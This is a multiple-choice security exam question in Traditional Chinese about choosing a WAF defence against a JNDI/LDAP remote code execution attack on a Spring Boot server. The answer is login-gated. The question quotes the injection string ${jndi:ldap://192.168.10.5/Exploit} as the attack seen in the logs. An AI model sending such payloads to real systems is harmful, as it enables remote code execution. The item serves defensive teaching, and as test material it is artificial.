9. 分析 WAF 攔截到的攻擊請求時,發現一段針對公司內部 Java Spring Boot 應用程式 的封包,內容包含:${jndi:ldap://192.168.10.5/Exploit} 已知該伺服器的 JDK 版本較 舊,未啟用 com.sun.jndi.ldap.object.trustURLCodebase=false。在無法立即升級應用程 式碼的情 況下, 下列 何項技術 對直接阻斷此類遠端程式碼執行(Remote Code Execution, RCE)攻擊最為適切?
(A) 在防火牆封鎖所有連往 192.168.10.5 的 TCP 80 流量
(B) 將伺服器的 HTTPS 憑證更換為強加密演算法(如 RSA 4096)
(C) 在 WAF 上啟用針對 jndi 關鍵字的輸入驗證規則
(D) 停用 Web 伺服器的 HTTP TRACE 方法

答案:登入後查看
統計: 尚無統計資料